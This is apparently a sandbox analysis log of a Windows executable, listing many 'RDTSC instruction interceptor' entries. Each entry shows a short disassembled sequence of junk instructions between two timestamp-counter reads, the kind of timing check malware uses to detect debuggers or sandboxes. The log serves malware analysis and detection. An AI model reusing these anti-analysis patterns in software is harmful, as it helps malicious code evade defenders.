                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC87B9 second address: BC87C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC894A second address: BC8968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FF624B4E7FDh 0x0000000b pushad 0x0000000c jmp 00007FF624B4E7DEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8AEF second address: BC8B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF624C75303h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF624C75309h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC8B23 second address: BC8B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE978 second address: BCE986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624C752F6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD482 second address: BCD4AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FF624B4E7DCh 0x0000000f jbe 00007FF624B4E7D6h 0x00000015 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4AB second address: BCD4D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF624C752FCh 0x00000008 jmp 00007FF624C75304h 0x0000000d popad 0x0000000e js 00007FF624C752FEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4D7 second address: BCD4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FF624B4E7FBh 0x0000000e pushad 0x0000000f jmp 00007FF624B4E7E3h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD4FB second address: BCD505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD7B0 second address: BCD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD7B6 second address: BCD7BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD94C second address: BCD951 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD951 second address: BCD968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FEh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD968 second address: BCD9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FF624B4E808h 0x0000000e push edx 0x0000000f jnp 00007FF624B4E7D6h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jmp 00007FF624B4E7E8h 0x0000001c jmp 00007FF624B4E7DAh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDACB second address: BCDADB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF624C752F6h 0x00000008 jns 00007FF624C752F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDADB second address: BCDAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF624B4E7DCh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDC63 second address: BCDC84 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FF624C75307h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDC84 second address: BCDC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE68D second address: BCE691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E7F second address: BD0E86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E86 second address: BD0E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E8C second address: BD0E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3FF89 second address: B3FF8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD740D second address: BD743A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF624B4E7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b ja 00007FF624B4E7D6h 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 jmp 00007FF624B4E7DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007FF624B4E7D6h 0x00000021 push eax 0x00000022 pop eax 0x00000023 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD743A second address: BD7440 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7598 second address: BD759C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD759C second address: BD75A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75A2 second address: BD75AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jg 00007FF624B4E7D6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75AF second address: BD75CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75300h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FF624C752F6h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75CC second address: BD75FB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF624B4E7D6h 0x00000008 jmp 00007FF624B4E7DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FF624B4E7DCh 0x00000019 je 00007FF624B4E7D6h 0x0000001f jc 00007FF624B4E7DEh 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75FB second address: BD75FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD75FF second address: BD7606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7E46 second address: BD7E52 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF624C752F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD7E52 second address: BD7E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007FF624B4E7D6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnl 00007FF624B4E7EAh 0x00000014 jmp 00007FF624B4E7E4h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD890C second address: BD895C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FF624C75303h 0x0000000d jmp 00007FF624C752FAh 0x00000012 push eax 0x00000013 jmp 00007FF624C75305h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF624C75302h 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8C20 second address: BD8C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8C26 second address: BD8C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF624C752F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e jp 00007FF624C752F6h 0x00000014 jbe 00007FF624C752F6h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c pushad 0x0000001d pushad 0x0000001e jnc 00007FF624C752F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE105D second address: BE1068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF624B4E7D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE01DB second address: BE01DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05A3 second address: BE05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05A7 second address: BE05B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF624C752F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE05B7 second address: BE05BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0746 second address: BE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE074E second address: BE0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0754 second address: BE075F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE075F second address: BE0763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE0763 second address: BE0787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FF624C75307h 0x0000000e jmp 00007FF624C75301h 0x00000013 push eax 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE09F7 second address: BE09FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE0BAD second address: BE0BC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE0D1C second address: BE0D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE0D20 second address: BE0D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF624C752FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE68C4 second address: BE68CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE68CD second address: BE68D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE69FA second address: BE69FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE69FE second address: BE6A1B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF624C752FFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6A1B second address: BE6A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6CFC second address: BE6D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF624C75304h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6EA0 second address: BE6EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE6FF9 second address: BE7006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FF624C752F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7006 second address: BE700A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE746B second address: BE7482 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FF624C75301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE7E9F second address: BE7EAA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE857F second address: BE858D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C752FAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BE858D second address: BE8591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF994 second address: BEF99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF592 second address: BEF596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF596 second address: BEF5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF624C75302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF5A4 second address: BEF5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF624B4E7D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BEF5AE second address: BEF5B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB840 second address: BFB846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB846 second address: BFB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB84A second address: BFB84E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB84E second address: BFB854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB854 second address: BFB866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB866 second address: BFB86A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB86A second address: BFB88C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7DBh 0x00000007 jmp 00007FF624B4E7DFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB88C second address: BFB890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFB890 second address: BFB896 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD33C second address: BFD35A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF624C75309h 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD35A second address: BFD37B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF624B4E7E7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD37B second address: BFD37F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B393E5 second address: B393EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1D6 second address: BFD1E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF624C752F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFD1E0 second address: BFD1EC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF624B4E7DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0131F second address: C01323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0678E second address: C06794 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D6F4 second address: B2D6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D6F8 second address: B2D712 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF624B4E7E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B2D712 second address: B2D72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624C75305h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1C6C2 second address: C1C6E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7DEh 0x00000009 pop eax 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d ja 00007FF624B4E7D6h 0x00000013 jnl 00007FF624B4E7D6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1AFF5 second address: C1B016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF624C75307h 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B016 second address: C1B01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B01A second address: C1B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B01E second address: C1B02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B02A second address: C1B02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B02E second address: C1B068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FF624B4E7DEh 0x0000000e jg 00007FF624B4E7D6h 0x00000014 popad 0x00000015 pushad 0x00000016 jmp 00007FF624B4E7E7h 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B068 second address: C1B06E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1B7 second address: C1B1CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF624B4E7DBh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B1CD second address: C1B1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B59F second address: C1B5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B5A5 second address: C1B5C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FF624C75302h 0x0000000c jmp 00007FF624C752FAh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1B5C1 second address: C1B5DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF624B4E7E8h 0x00000009 rdtsc
